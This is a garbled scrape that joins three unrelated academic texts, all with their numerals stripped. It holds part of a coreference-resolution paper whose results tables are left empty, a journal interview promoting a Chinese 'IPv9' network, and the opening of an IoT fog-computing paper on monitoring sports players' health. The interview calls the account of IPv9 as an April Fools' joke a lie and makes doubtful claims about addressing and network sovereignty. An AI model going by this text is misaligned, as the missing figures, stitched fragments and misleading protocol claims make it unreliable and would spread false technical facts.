trees, ne information, ...) shipped with the data. as additional resources we use only wordnet . (fellbaum, ) and the number/gender data of bergsma and lin ( ). for evaluation we follow the practice of the conll- shared task and employ the reference implementation of the conll scorer (pradhan et al., ) which computes the popular evaluation met- rics muc (vilain et al., ), b (bagga and bald- win, ), ceafe (luo, ) and their average. the average is the metric for ranking the systems in the conll shared tasks on coreference resolution (pradhan et al., ; pradhan et al., ). . features we employ a rich set of features frequently used in the literature (ng and cardie, ; bengtson and roth, ; björkelund and kuhn, ). the set consists of the following features: • the mention type (name, def. noun, indef. noun, citation form of pronoun, demonstrative) of anaphor, antecedent and both, • gender, number, semantic class, named en- tity class, grammatical function and length in words of anaphor, antecedent and both, • semantic head, first/last/preceding/next token of anaphor, antecedent and both, • distance between anaphor and antecedent in sentences, • modifier agreement, • whether anaphor and antecedent embed each other, • whether there is a string match, head match or an alias relation, • whether anaphor and antecedent have the same speaker. if the antecedent in the pair under consideration is m , i.e. the dummy mention, we do not extract any feature (chang et al., ). state-of-the-art models greatly benefit from fea- ture conjunctions. approaches for building such conjunctions include greedy extension (björkelund and kuhn, ), entropy-guided induction (fernan- des et al., ) and linguistically motivated heuris- tics (durrett and klein, ). we follow durrett and klein ( ) and conjoin every feature with each mention type feature. . model variants we now consider several instantiations of the ap- proaches discussed in the previous section in order of increasing complexity. these instantiations cor- respond to specific coreference models proposed in the literature. with the framework described in this paper, we are able to give a unified account of repre- senting and learning these models. we always train on automatically predicted mentions. we start with the mention pair model. to create training graphs, we employ a slight modification of the closest pair heuristic (soon et al., ), which worked best in preliminary experiments. for each mention mj which is in some coreference chain and has an antecedent mi, we add an edge to mi with label “+”. for all k with i < k < j, we add an edge from mj to mk with label “−”. if mj does not have an antecedent, we add edges from mj to mk with label “−” for all < k < j. compared to the heuristic of soon et al. ( ), who only learn from anaphoric mentions, this improves precision. during testing, if for a mention mj no pair (mj,mi) is deemed as coreferent, we consider the mention as not anaphoric. otherwise, we employ best-first clus- tering and take the mention in the highest scoring pair as the antecedent of mj (ng and cardie, ). the mention ranking model tries to improve the mention pair model by capturing the competition between antecedents. we consider two variants of the mention ranking model, where each em- ploys dummy mentions for anaphoricity determina- tion. the first variant closest (denis and baldridge, ) constrains the latent structures consistent with the gold annotation: for each mention, the closest antecedent is chosen as the gold antecedent. if the mention does not have any antecedent, we take the dummy mention m as the antecedent. the sec- ond variant latent (chang et al., ) aims to learn from more meaningful antecedents by dropping the constraints, and therefore selecting the best-scoring antecedent (which may also be m ) under the cur- rent model during training. we view the antecedent tree model (fernandes et al., ) as a natural extension of the mention rank- ing model. instead of predicting an antecedent for each mention, we predict an entire tree of anaphor- antecedent pairs. this should yield more consistent entities. as in previous work we only consider the latent variant. for the mention ranking model and for antecedent trees we use a cost function similar to previous work (durrett and klein, ; fernandes et al., ). for a pair of mentions (mj,mi), we consider cpair(mj,mi) =    λ i > and mj,mi are not coreferent, λ i = and mj is anaphoric, otherwise, where λ > will be tuned on development data. let ĥi = (vi,ai,lai). cpair is extended to a cost function for the whole latent structure ĥi by c(x,ĥi, ĥopt,i,z) = ∑ (mj,mk)∈ai cpair(mj,mk). the use of such a cost function is necessary to learn reasonable weights, since most automatically extracted mentions in the data are not anaphoric. . experimental setup we evaluate the models on the development and the test sets. when evaluating on the test set, we train on the concatenation of the training and development set. after preliminary experiments with the ranking model with closest antecedents on the development set, we set the number of perceptron epochs to and set λ = in the cost function. we assess statistical significance of the difference in f score for two approaches via an approximate randomization test (noreen, ). we say an im- provement is statistically significant if p < . . muc b ceafe model r p f r p f r p f average f conll- english development data fernandes et al. ( ) . . . . . . . . . . björkelund and kuhn ( ) . . . . . . . . . . mention pair . . . . . . . . . . ranking: closest . . . ∗ . . . ∗ . . . ∗ . ranking: latent . . . �× . . . †� . . . †�× . antecedent trees . . . . . . . . . . conll- english test data fernandes et al. ( ) . . . . . . . . . . björkelund and kuhn ( ) . . . . . . . . . . mention pair . . . . . . . . . . ranking: closest . . . ∗ . . . ∗ . . . ∗ . ranking: latent . . . � . . . †� . . . †� . antecedent trees . . . . . . . . . . table : results of different systems and model variants on conll- english development and test data. models below the dashed lines are implemented in our framework. the best f score results for each dataset and metric are boldfaced. ∗ indicates significant improvements in f score of ranking: closest compared to mention pair; † indicates significant improvements of ranking: latent compared to ranking: closest; � indicates significant improvements of ranking: latent compared to antecedent trees; × indicates significant improvements of ranking: latent compared to björkelund and kuhn ( ). we do not perform significance tests on differences in average f since this measure constitutes an average over other f scores. . results table shows the result of all model configurations discussed in the previous section on conll’ en- glish development and test data. in order to put the numbers into context, we also report the re- sults of björkelund and kuhn ( ), who present a system that implements an antecedent tree model with non-local features. their system is the highest- performing system on the conll data which op- erates in a closed track setting. we also compare with fernandes et al. ( ), the winning system of the conll- shared task (pradhan et al., ) . both systems were trained on training data for eval- uating on the development set, and on the concatena- we do not compare with the system of durrett and klein ( ) since it uses wikipedia as an additional resource, and therefore does not work under the closed track setting. its per- formance is . average f ( . muc f , . b f and . ceafe f ) on conll- english test data. tion of training and development data for evaluating on the test set. despite its simplicity, the mention pair model yields reasonable performance. the gap to björkelund and kuhn ( ) is roughly . points in average f score on test data. compared to the mention pair model, the variants of the mention ranking model improve the results for all metrics, largely due to increased precision. switching from regarding the closest antecedent as the gold antecedent to latent antecedents yields an improvement of roughly . points in average f . all improvements of the mention ranking model with closest antecedents compared to the mention pair model are statistically significant. furthermore, with the exception of the differences in muc f , all improvements are significant when switching from closest antecedents to latent antecedents. the mention ranking model with latent an- recall precision model errors max % of max errors max % of max mention pair % % ranking: closest % % ranking: latent % % antecedent trees % % table : overview of recall and precision errors. tecedents outperforms the state-of-the-art system by björkelund and kuhn ( ) by more than . points average f . these results show the com- petitiveness of a simple mention ranking architec- ture. regarding the individual f scores compared to björkelund and kuhn ( ), the improvements in the muc and ceafe metrics on development data are statistically significant. the improvements on test data are not statistically significant. using antecedent trees yields higher precision than using the mention ranking model. however, recall is much lower. the performance is similar to the antecedent tree models of fernandes et al. ( ) and björkelund and kuhn ( ). analysis the numbers discussed in the previous section do not give insights into where the models make differ- ent decisions. are there specific linguistic classes of mention pairs where one model is superior to the other? how do the outputs differ? how can these differences be explained by different structures em- ployed by the models? in order to answer these questions, we need to per- form a qualitative analysis of the differences in sys- tem output for the approaches. to do so, we employ the error analysis method presented in martschat and strube ( ). in this method, recall errors are ex- tracted via comparing spanning trees of reference entities with system output. edges in the spanning tree missing from the output are extracted as errors. for extracting precision errors, the roles of reference and system entities are switched. to define the span- ning trees, we follow martschat and strube ( ) and use a notion based on ariel’s accessibility the- ory (ariel, ) for reference entities, while we take system antecedent decisions for system entities. . overview we extracted all errors of the model variants de- scribed in the previous section on conll- en- glish development data. table gives an overview of all recall and preci- sion errors. for each model variant the table shows the number of recall and precision errors, and the maximum number of errors . the numbers con- firm the findings obtained from table : the ranking models beat the mention pair model largely due to fewer precision errors. the antecedent tree model outputs more precise entities by establishing fewer coreference links: it makes fewer decisions and fewer precision errors than the other configurations, but at the expense of an increased number of recall errors. the more sophisticated models make consistently fewer linking decisions than the mention pair model. we therefore hypothesize that the improvements in the numbers mainly stem from improved anaphoric- ity determination. the mention pair model handles anaphoricity determination implicitly: if for a men- tion mj no pair (mj,mi) is deemed as coreferent, the model does not select an antecedent for mj . since the mention ranking model allows to include the search for the best antecedent during prediction, we can explicitly model the anaphoricity decision, via including the dummy mention during search. we now examine the errors in more detail to in- vestigate this hypothesis. to do so, we will investi- for recall, the maximum number of errors is the number of errors made by a system that assigns each mention to its own entity. for precision, the maximum number of errors is the total number of anaphor-antecedent decisions made by the model. initial experiments which included the dummy mention during learning for the mention pair model yielded worse re- sults. this is arguably due to the large number of non-anaphoric mentions, which causes highly imbalanced training data. name/noun anaphor pronoun model both name mixed both noun i/you/we he/she it/they remaining upper bound mention pair ranking: closest ranking: latent antecedent trees table : recall errors of model variants on conll- english development data. name/noun anaphor pronoun model both name mixed both noun i/you/we he/she it/they remaining err. corr. err. corr. err. corr. err. corr. err. corr. err. corr. err. corr. mention pair ranking: closest ranking: latent antecedent trees table : precision errors (err.) and correct links (corr.) of model variants on conll- english development data. gate error classes, and compare the models in terms of how they handle these error classes. this is a practice common in the analysis of coreference reso- lution approaches (stoyanov et al., ; martschat and strube, ). we distinguish between errors where both mentions are a proper name or a com- mon noun, errors where the anaphor is a pronoun and the remaining errors. tables and summarize recall and precision er- rors for subcategories of these classes . we now compare individual models. . mention ranking vs. mention pair for pairs of proper names and pairs of common nouns, employing the ranking model instead of the mention pair model leads to a large decrease in pre- cision errors, but an increase in recall errors. for pronouns and mixed pairs, we can observe decreases in recall errors and slight increases in precision er- rors, except for it/they, where both recall precision errors decrease. we can attribute the largest differences to deter- mining anaphoricity: in % of all precision errors for the pronoun subcategories, we map each pronoun to its canonical form. for example, we map him to he. between two proper names made by the mention pair model, but not by the ranking model, the mention appearing later in the text is non-anaphoric. the ranking model correctly determines this. similar numbers hold for common noun pairs. while most nouns and names are not anaphoric, most pronouns are. hence, determining anaphoric- ity is less of an issue here. from the resolved it/they recall errors of the ranking model compared to the mention pair model, we can attribute % to bet- ter antecedent selection: the mention pair model de- cided on a wrong antecedent. the ranking model, however, was able to leverage the competition be- tween the antecedents to decide on a correct an- tecedent. the remaining % stem from selecting a correct antecedent for pronouns that were classified as non-anaphoric by the mention pair model. we observe similar trends for the other pronoun classes. overall, the majority of error reduction can be attributed to improved determination of anaphoric- ity, which can be modeled structurally in the men- tion ranking model (we do not use any features when a dummy mention is involved, therefore non- anaphoricity decisions always get the score ). however, for pronoun resolution, where there are many competing compatible antecedents for a men- tion, the model is able to learn better weights by leveraging the competition. these findings suggest that extending the mention pair model to explicitly determine anaphoricity should improve results espe- cially for non-pronominal coreference. . latent antecedent vs. closest antecedent using latent instead of closest antecedents leads to fewer recall errors and more precision errors for non-pronominal coreference. pronoun resolution re- call errors slightly increase, while precision errors slightly decrease. while these changes are minor, there is a large reduction in the remaining precision errors. most of these correspond to predictions which are consid- ered very difficult, such as links between a proper name anaphor and a pronoun antecedent (bengtson and roth, ). via latent antecedents, the model can avoid learning from the most unreliable pairs. . antecedent trees vs. ranking compared to the ranking model with latent an- tecedents, the antecedent tree model commits con- sistently more recall errors and fewer precision er- rors. this is partly due to the fact that the antecedent tree model also predicts fewer links between men- tions than the other models. the only exception is he/she, where there is not much of a difference. the only difference between the ranking model with latent antecedents and the antecedent tree model is that weights are updated document-wise for antecedent trees, while they are updated per anaphor for the ranking model. this leads to more precise predictions, at the expense of recall. . summary our analysis shows that the mention ranking model mostly improves precision over the mention pair model. for non-pronominal coreference, the im- provements can be mainly attributed to improved anaphoricity determination. for pronoun resolution, both anaphoricity determination and capturing an- tecedent competition lead to improved results. em- ploying latent antecedents during training mainly helps in resolving very difficult cases. due to the update strategy, employing antecedent trees leads to a more precision-oriented approach, which signifi- cantly improves precision at the expense of recall. beyond pairwise predictions in this paper we concentrated on representing and analyzing the most prevalent approaches to coref- erence resolution, which are based on predicting whether pairs of mentions are coreferent. hence, we choose graphs as latent structures and let the feature functions factor over edges in the graph, which cor- respond to pairs of mentions. however, entity-based approaches (rahman and ng, ; stoyanov and eisner, ; lee et al., , inter alia) obtain coreference chains by pre- dicting whether sets of mentions are coreferent, go- ing beyond pairwise predictions. while a detailed discussion of such approaches is beyond the scope of this paper, we now briefly describe how we can generalize the proposed framework to accommodate for such approaches. when viewing coreference resolution as predic- tion of latent structures, entity-based models op- erate on structures that relate sets of mentions to each other. this can be expressed by hypergraphs, which are graphs where edges can link more than two nodes. hypergraphs have already been used to model coreference resolution (cai and strube, ; sapena, ). to model entity-based approaches, we extend the valid latent structures to labeled directed hyper- graphs. these are tuples h = (v,a,la), where • the set of nodes are the mentions, v = m x, • the set of edges a ⊆ v × v consists of di- rected hyperedges linking two sets of mentions, • la : a → l assigns a label ` ∈ l to each edge. l is a finite set of labels. for example, the entity-mention model (yang et al., ) predicts coreference in a left-to-right fash- ion. for each anaphor mj, it considers the set ej ⊆ {m ,...,mj− } of preceding partial entities that have been estab- lished so far (such as e = {m ,m ,m }). in terms of our framework, substructures for this ap- proach are hypergraphs with hyperedges ({mj} ,e) for e ∈ ej, encoding the decision to which partial entity mj refers. the definitions of features and the decoding prob- lem carry over from the graph-based framework (we drop the edge factorization assumption for features). learning requires adaptations to cope with the de- pendency between coreference decisions. for exam- ple, for the entity-mention model, establishing that an anaphor mj refers to a partial entity e influences the search space for decisions for anaphors mk with k > j. we leave a more detailed discussion to future work. related work the main contributions of this paper are a frame- work for representing coreference resolution ap- proaches and a systematic comparison of main coreference approaches in this framework. our representation framework generalizes ap- proaches to coreference resolution which employed specific latent structures for representation, such as latent antecedents (chang et al., ) and an- tecedent trees (fernandes et al., ). we give a unified representation of such approaches and show that seemingly disparate approaches such as the mention pair model also fit in a framework based on latent structures. only few studies systematically compare ap- proaches to coreference resolution. most previous work highlights the improved expressive power of the presented model by a comparison to a men- tion pair baseline (culotta et al., ; denis and baldridge, ; cai and strube, ). rahman and ng ( ) consider a series of mod- els with increasing expressiveness, ranging from a mention pair to a cluster-ranking model. however, they do not develop a unified framework for compar- ing approaches, and their analysis is not qualitative. fernandes et al. ( ) compare variations of an- tecedent tree models, including different loss func- tions and a version with a fixed structure. they only consider antecedent trees and also do not provide a qualitative analysis. kummerfeld and klein ( ) and martschat and strube ( ) present a large- scale qualitative comparison of coreference systems, but they do not investigate the influence of the latent structures the systems operate on. furthermore, the systems in their studies differ in terms of mention extraction and feature sets. conclusions we observed that many approaches to coreference resolution can be uniformly represented by the latent structure they operate on. we devised a framework that accounts for such structures, and showed how we can express the mention pair model, the mention ranking model and antecedent trees in this frame- work. an evaluation of the models on conll- data showed that all models yield competitive results. while antecedent trees give results with the high- est precision, a mention ranking model with latent antecedent performs best, obtaining state-of-the-art results on conll- data. an analysis based on the method of martschat and strube ( ) highlights the strengths of the mention ranking model compared to the mention pair model: it is able to structurally model anaphoricity deter- mination and antecedent competition, which leads to improvements in precision for non-pronominal coreference resolution, and in recall for pronoun res- olution. the effect of latent antecedents is negligible and has a large effect only on very difficult cases of coreference. the flexibility of the framework, toolkit and analysis methods presented in this paper helps re- searchers to devise, analyze and compare represen- tations for coreference resolution. acknowledgments this work has been funded by the klaus tschira foundation, heidelberg, germany. the first au- thor has been supported by a hits phd scholar- ship. we thank the anonymous reviewers and our colleagues benjamin heinzerling, yufang hou and nafise moosavi for feedback on earlier drafts of this paper. furthermore, we are grateful to anders björkelund for helpful comments on cost functions. references mira ariel. . accessing noun phrase antecedents. routledge, london, u.k.; new york, n.y. amit bagga and breck baldwin. . algorithms for scoring coreference chains. in proceedings of the st international conference on language resources and evaluation, granada, spain, – may , pages – . eric bengtson and dan roth. . understanding the value of features for coreference resolution. in pro- ceedings of the conference on empirical meth- ods in natural language processing, waikiki, hon- olulu, hawaii, – october , pages – . shane bergsma and dekang lin. . bootstrapping path-based pronoun resolution. in proceedings of the st international conference on computational lin- guistics and th annual meeting of the association for computational linguistics, sydney, australia, – july , pages – . anders björkelund and jonas kuhn. . learning structured perceptrons for coreference resolution with latent antecedents and non-local features. in proceed- ings of the nd annual meeting of the association for computational linguistics (volume : long papers), baltimore, md., – june , pages – . jie cai and michael strube. . end-to-end coref- erence resolution via hypergraph partitioning. in proceedings of the rd international conference on computational linguistics, beijing, china, – au- gust , pages – . kai-wei chang, rajhans samdani, alla rozovskaya, mark sammons, and dan roth. . illinois-coref: the ui system in the conll- shared task. in proceedings of the shared task of the th confer- ence on computational natural language learning, jeju island, korea, – july , pages – . michael collins. . discriminative training meth- ods for hidden markov models: theory and experi- ments with perceptron algorithms. in proceedings of the conference on empirical methods in natural language processing, philadelphia, penn., – july , pages – . koby crammer, ofer dekel, joseph keshet, shai shalev- shwartz, and yoram singer. . online passive- aggressive algorithms. journal of machine learning research, : – . aron culotta, michael wick, and andrew mccallum. . first-order probabilistic models for coreference resolution. in proceedings of human language tech- nologies : the conference of the north american chapter of the association for computational linguis- tics, rochester, n.y., – april , pages – . pascal denis and jason baldridge. . specialized models and ranking for coreference resolution. in pro- ceedings of the conference on empirical meth- ods in natural language processing, waikiki, hon- olulu, hawaii, – october , pages – . greg durrett and dan klein. . easy victories and uphill battles in coreference resolution. in proceed- ings of the conference on empirical methods in natural language processing, seattle, wash., – october , pages – . greg durrett and dan klein. . a joint model for en- tity analysis: coreference, typing, and linking. trans- actions of the association of computational linguis- tics, : – . charles elkan. . the foundations of cost-sensitive learning. in proceedings of the th international joint conference on artificial intelligence, seattle, wash., – august, , pages – . christiane fellbaum, editor. . wordnet: an elec- tronic lexical database. mit press, cambridge, mass. eraldo fernandes, cı́cero dos santos, and ruy milidiú. . latent trees for coreference resolution. compu- tational linguistics, ( ): – . jenny rose finkel and christopher manning. . en- forcing transitivity in coreference resolution. in com- panion volume to the proceedings of the th annual meeting of the association for computational linguis- tics, columbus, ohio, – june , pages – . peter geibel and fritz wysotzk. . perceptron based learning with example dependent and noisy costs. in proceedings of the th international conference on machine learning, washington, d.c., – august , pages – . richard w. hamming. . error detecting and er- ror correcting codes. bell system technical journal, ( ): – . jerry r. hobbs. . pronoun resolution. technical report - , dept. of computer science, city college, city university of new york. dan klein and christopher d. manning. . parsing and hypergraphs. in proceedings of the seventh in- ternational workshop on parsing technologies (iwpt- ), - october , beijing, china, pages – . manfred klenner. . enforcing consistency on coref- erence sets. in proceedings of the international con- ference on recent advances in natural language pro- cessing, borovets, bulgaria, – september , pages – . jonathan k. kummerfeld and dan klein. . error- driven analysis of challenges in coreference resolution. in proceedings of the conference on empiri- cal methods in natural language processing, seattle, wash., – october , pages – . shalom lappin and herbert j. leass. . an algo- rithm for pronominal anaphora resolution. computa- tional linguistics, ( ): – . heeyoung lee, angel chang, yves peirsman, nathanael chambers, mihai surdeanu, and dan jurafsky. . deterministic coreference resolution based on entity- centric, precision-ranked rules. computational lin- guistics, ( ): – . adam lopez. . translation as weighted deduction. in proceedings of the th conference of the european chapter of the association for computational linguis- tics, athens, greece, march – april , pages – . xiaoqiang luo. . on coreference resolution per- formance metrics. in proceedings of the human lan- guage technology conference and the confer- ence on empirical methods in natural language pro- cessing, vancouver, b.c., canada, – october , pages – . sebastian martschat and michael strube. . recall error analysis for coreference resolution. in proceed- ings of the conference on empirical methods in natural language processing, doha, qatar, – october , pages – . vincent ng and claire cardie. . improving machine learning approaches to coreference resolution. in pro- ceedings of the th annual meeting of the association for computational linguistics, philadelphia, penn., – july , pages – . eric w. noreen. . computer-intensive methods for testing hypotheses. an introduction. wiley, new york. sameer pradhan, lance ramshaw, mitchell marcus, martha palmer, ralph weischedel, and nianwen xue. . conll- shared task: modeling unre- stricted coreference in ontonotes. in proceedings of the shared task of the th conference on compu- tational natural language learning, portland, oreg., – june , pages – . sameer pradhan, alessandro moschitti, nianwen xue, olga uryupina, and yuchen zhang. . conll- shared task: modeling multilingual unrestricted coreference in ontonotes. in proceedings of the shared task of the th conference on computational natural language learning, jeju island, korea, – july , pages – . sameer pradhan, xiaoqiang luo, marta recasens, ed- uard hovy, vincent ng, and michael strube. . scoring coreference partitions of predicted mentions: a reference implementation. in proceedings of the nd annual meeting of the association for compu- tational linguistics (volume : short papers), balti- more, md., – june , pages – . altaf rahman and vincent ng. . narrowing the modeling gap: a cluster-ranking approach to corefer- ence resolution. journal of artificial intelligence re- search, : – . emili sapena. . a constraint-based hyper- graph partitioning approach to coreference resolution. ph.d. thesis, departament de llenguatges i sistemes informàtics, universitat politècnica de catalunya, barcelona, spain. wee meng soon, hwee tou ng, and daniel chung yong lim. . a machine learning approach to corefer- ence resolution of noun phrases. computational lin- guistics, ( ): – . veselin stoyanov and jason eisner. . easy-first coreference resolution. in proceedings of the th in- ternational conference on computational linguistics, mumbai, india, – december , pages – . veselin stoyanov, nathan gilbert, claire cardie, and ellen riloff. . conundrums in noun phrase coref- erence resolution: making sense of the state-of-the- art. in proceedings of the joint conference of the th annual meeting of the association for computational linguistics and the th international joint conference on natural language processing, singapore, – au- gust , pages – . xu sun, takuya matsuzaki, daisuke okanohara, and jun’ichi tsujii. . latent variable perceptron al- gorithm for structured classification. in proceedings of the th international joint conference on artificial intelligence, pasadena, cal., – july , pages – . marc vilain, john burger, john aberdeen, dennis con- nolly, and lynette hirschman. . a model- theoretic coreference scoring scheme. in proceedings of the th message understanding conference (muc- ), pages – , san mateo, cal. morgan kaufmann. xiaofeng yang, jian su, jun lang, chew lim tan, ting liu, and sheng li. . an entity-mention model for coreference resolution with inductive logic pro- gramming. in proceedings of the th annual meeting of the association for computational linguistics: hu- man language technologies, columbus, ohio, – june , pages – . chun-nam john yu and thorsten joachims. . learning structural svms with latent variables. in proceedings of the th international conference on machine learning, montréal, québec, canada, – june , pages – . international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - interview with the inventor of the future network ipv guoshao chen school of computer science and engineering xi'an technological university xi'an, , china e-mail: @qq.com wang yubian department of railway transportation control belarusian state university of transport , kirova street, gomel, , republic of belarus e-mail: alika_wang@mail.ru abstract—with the rapid development of the internet, from the pc terminal to the mobile terminal, from big data systems to intelligent hardware, technology has shown the unique charm of the internet. with the development of the internet, the network information security and network sovereignty issues involved have become increasingly prominent. therefore, only in an environment of security, equality, and mutual assistance can the internet play its due economic and social value. the emergence of a new generation of internet ipv marks a key step for china to move towards an autonomous and controllable future network. ipv is to further safeguard national network sovereignty on the basis of fully guaranteeing network information security. but the defamation of ipv still exists. recently, in order to further clarify the facts, we hereby interviewed xie jianping, the inventor of the decimal network, to conduct an in-depth discussion on the new generation internet ipv . keywords-ipv ; future network; decimal network i. introduction the core of the current internet (also known as the internet) technology is ipv and ipv , and its technical core is completely controlled by the united states. on december , , the us federal communications commission (fcc) officially abolished the net neutrality rule, making the internet with obvious political color and posing a serious threat to internet applications in various countries. the address space of the ipv protocol is to the power of . due to the insufficient estimation of the development trend of the internet in the early stage of internet, the insufficient setting of the address space length caused the unreasonable ip allocation. by , there were no addresses to allocate. in theory, ipv has addresses, but only one eighth of the addresses can be assigned to end users, so there are only addresses, which is equivalent to . the bar code in the internet of things is already , which cannot be covered, so ipv also has certain limitations. since the establishment of the decimal network standards working group of the ministry of industry and information technology in august , shanghai decimal network information technology co., ltd. has conducted more than years of research in the future network field, developed a complete network framework system, and completed ipv with independent intellectual property rights. the patent obtained by ipv ( , patent number cn ) has been recognized by many countries including china, the united states, the united kingdom, russia and other countries. this international journal of advanced network, monitoring and controls volume , no. , innovative and internationally strategic new achievement has been vigorously endorsed by the ministry of industry and information technology, the national standards committee and other ministries supported the establishment of a second network system other than the united states. ii. future network ipv in dr zhang's article, ipv is the legal version of the american ietf. the ipv is a version that the united states has publicly declared unsuccessful, but has never abandoned. figure . ipv ev as early as , the united states admitted that ipv address length was inadequate and announced that the old system was behind the times, and began working on ipv , but it was never successful. at present, ipv is being developed in the united states. what is the concept of ipv ? because ipv and ipv are not compatible, ipv solves the problem of communication between ipv and ipv mutual group machine, and the address length should reach bits. the main reasons for the insufficient length of the ipv address are as follows: first, the length of the current bar code ean·ucc on the internet of things is to the th power, while ipv can only achieve to the th power. second, iso has clearly mentioned that the length of the new future network should exceed bits. third, the united states is developing a new network (ipv ) with -bit ip addresses. this is the same as the new ip proposed by huawei, which is unanimously inclined to the viewpoint that the ipv address length is not enough. evidence no. of ipv ev indicates that the statement “ipv is a joke on april fool's day ” disseminated by shenyang, fang zhouzi and a few academicians international journal of advanced network, monitoring and controls volume , no. , and authoritative network experts in china is a lie. ipv is a protocol with an official version number and a specific technical background. the original technical documentation for ipv , tuba, was published by ietf two years before ietf and ietf . ipv is a technology officially approved by the ietf and issued with a version number. ipv is not a closed network, but is connected to the internet in foreign countries. ipv can completely build a pure ipv network, and then connect to the old network through a gateway. the relationship between the future network and the internet is like the relationship between the new highway and the old highway, which can operate independently or be interconnected. ipv information can be used in ipv network content circulation, digital domain name is owned by china's own root server, in foreign countries to cut off the network channel and stop the exchange of top-level domain (tld), the use of digital domain users are not affected. in the event of foreign intervention or accident to cut off the overseas access to the internet, china's network can still maintain a safe and stable operation. the ipv address of the future network is basically bits long, and can be expanded to and bits. it can be expressed in simplified decimal or variable length to meet various application scenarios, while ipv address only , , bits version and incompatible. the future network ipv effective address length - bits, can be independently and bidirectionally addressed, and can meet the needs of the internet of things and digital currencies. the address block architecture of ipv restricts its cross-city mobile and bidirectional addressing. it must deduct the -bit network number of each international and operator. the effective url is only bits, which cannot meet the needs of the internet of things mobility and the number of urls. therefore, ipv is a milestone for china to maintain national network sovereignty, guarantee the security of network information, break the monopoly of the us internet, and promote the rapid development of a new generation of internet with independent control and secure interconnection. iii. future network patent china ipv has found a way to implement it, applying for patents and copyright protection. and there are many innovations in the concept of technology, and the development achievements have been remarkable. the main results are as follows: first, the program is complete. china's future network ipv has formed a complete technical solution, including many core technologies, such as naming and addressing technology, three-and-four-layer composite architecture technology, character direct routing technology, terminal analysis technology, compatible interoperability technology and new network security technology. second, it is well equipped. china has developed the key equipment for the future commercial application of network ipv , including root server, core router, parsing server and so on. third, the standard is leading. in the domestic standard, the country has issued a number of technical standards based on decimal network and ipv . internationally, the core technology concept of ipv has been adopted into the international standard, and many technical solutions are about to apply to the international standard for approval. it is shown in figure . international journal of advanced network, monitoring and controls volume , no. , figure . official document of the future network domestic standards for future networks (iso- /ipv ) include: electronic industry standard of the people's republic of china sj/t- - , sj/t- - , sj/t- - , sj/t- - , sb/t- - , sj/t- - . it is shown in figure . future network ipv has obtained patents in china ( inventions, utility models). the method by which the computer assigns the address of the computer by the whole decimal algorithm (patent no.: zl ). a method for the uniform compilation and distribution of addresses of networked computers and intelligent terminals (patent no.: zl ). the method of assigning addresses to computers on the internet by using full-digit code (patent no.: zl ). guidance code and its application system for goods and commodity code networking (patent no.: zl x). a networked tax control system and its application method (patent no.: zl ). digital remote video monitoring system device (patent no.: zl ). the future network has also been awarded a us patent. it is shown in figure . international journal of advanced network, monitoring and controls volume , no. , figure . future network china standard content international journal of advanced network, monitoring and controls volume , no. , figure . ipv us patent certificate iv. typical applications of ipv at present, my country has built demonstration projects of ipv address space, root domain name server and ipv backbone optical cable system in beijing, shanghai, shandong, jiangsu and zhejiang, and is building a national military-civilian fusion ipv backbone optical cable and gateway bureau. the ipv network has now completed multi-point testing applications and has obtained good test data. at present, china has established an "n" financial root domain name server which supports bit address space. it has laid a foundation for the unified format of digital currency in china and even the whole world. in the process of issuing digital currency, the root domain name server and the top-level domain name server in the united states can avoid the management control of the overall digital currency issuing network communication system in china. china's digital currency network communication system must have a financial root domain name server parallel to the united states and a "chn" national top-level domain name server and its supporting digital currency electronic vouchers, payment processing and other security service facilities, and adopt advanced advanced authentication before communication technology and supporting domestic encryption technology international journal of advanced network, monitoring and controls volume , no. , completely solve the problem of financial information security, ensure china's financial stability, and safeguard national sovereignty. at the same time, the establishment of a third-party platform for digital currency and physical currency conversion, electronic bills and electronic business path and identity and qualification certification based on the decimal network root domain name server, and unified national prior identification and management. the project of healthy tai 'an ipv big data platform relies on the existing backbone optical cable and user transmission and access network of tai 'an branch of shandong radio and television network co., ltd., and uses ipv network technology for upgrading and reconstruction. the network covers medical and health institutions at city, county, township and village levels as well as tai’an city financial bureau, medical insurance bureau and administrative departments of tai’an. the bandwidth meets the requirements of big data business of tai’an health and sustainable expansion, and the compatible and safe operation of ipv network and ipv network is realized. v. conclusion ipv is a new generation network architecture researched and developed by chinese scholars. it is fully autonomous and controllable, with large address space and safe high-speed large code stream transmission. the distributed analysis of the network has low latency and is compatible with the current internet system. future network is a method of empty cup design and new architecture to develop a network system independent of the existing internet to achieve a more secure, more economical, faster and more flexible network. the future network will be developed in years and put into preliminary commercial use around . reference [ ] rfc - internet standard. internet protocol, darpa internet program protocol specification, rfc , . . [ ] s.deering, r. hinden, network working group. internet protocol, version (ipv )-specification, rfc- , . . [ ] m. crawford. network working group. transmission of ipv packets over ethernet networks. rfc- , . . [ ] j. onions, network working group. a historical perspective on the usage of ip version . rfc . . . [ ] v. cerf, network working group. a view from the st century, rfc . . . a novel iot-based health and tactical analysis model with fog computing a novel iot-based health and tactical analysis model with fog computing aykut karakaya and sedat akleylek department of computer technologies, bulent ecevit university, zonguldak, turkey department of computer engineering, ondokuz mayis university, samsun, turkey abstract in sports competitions, depending on the conditions such as excitement, stress, fatigue, etc. during the match, negative situations such as disability or loss of life may occur for players and spectators. therefore, it is extremely important to constantly check their health. in addition, some strategic analyzes are made during the match. according to the results of these analyzes, the technical team affects the course of the match. effects can have positive and sometimes negative results. in this article, fog computing and an internet of things (iot) based architecture are proposed to produce new technical strategies and to avoid disabilities. players and spectators are monitored with sensors such as blood pressure, body temperature, heart rate, location etc. the data obtained from the sensors are processed in the fog layer and the resulting information is sent to the devices of the technical team and club doctors. in the architecture based on fog computing and iot, priority processes are computed with low latency. for this, a task management algorithm based on priority queue and list of fog nodes is modified in the fog layer. authentication and data confidentiality are provided with the federated lightweight authentication of things (flat) method used in the proposed model. in addition, using the software defined network controller based on blockchain technology ensures data integrity. subjects algorithms and analysis of algorithms, computer networks and communications, emerging technologies, security and privacy keywords internet of things, health monitoring, information security, fog computing, tactical analysis, blockchain introduction with the use of technological developments in the fields of health and sports, more efficient methods are obtained than traditional ones. data such as player health, spectator health, and tactical analysis in the match are very important. instantly checking the health status of people on and off the field, and early detection of certain events in tactical analysis make the competition better. for this, applications based on the internet of things (iot) are quite suitable. most iot applications use cloud services for storage and computing. using fog computing improves efficiency for a large-scale iot application involving spectators, players and other actors. since a sports field is within certain limits, the data can be processed on local servers instead of the remote cloud server. this ensures that responses are delivered to the user with low latency because it is important to get quick response to technical team and doctors in terms of early intervention (ikram, alshehri & hussain, ). how to cite this article karakaya a, akleylek s. . a novel iot-based health and tactical analysis model with fog computing. peerj comput. sci. :e doi . 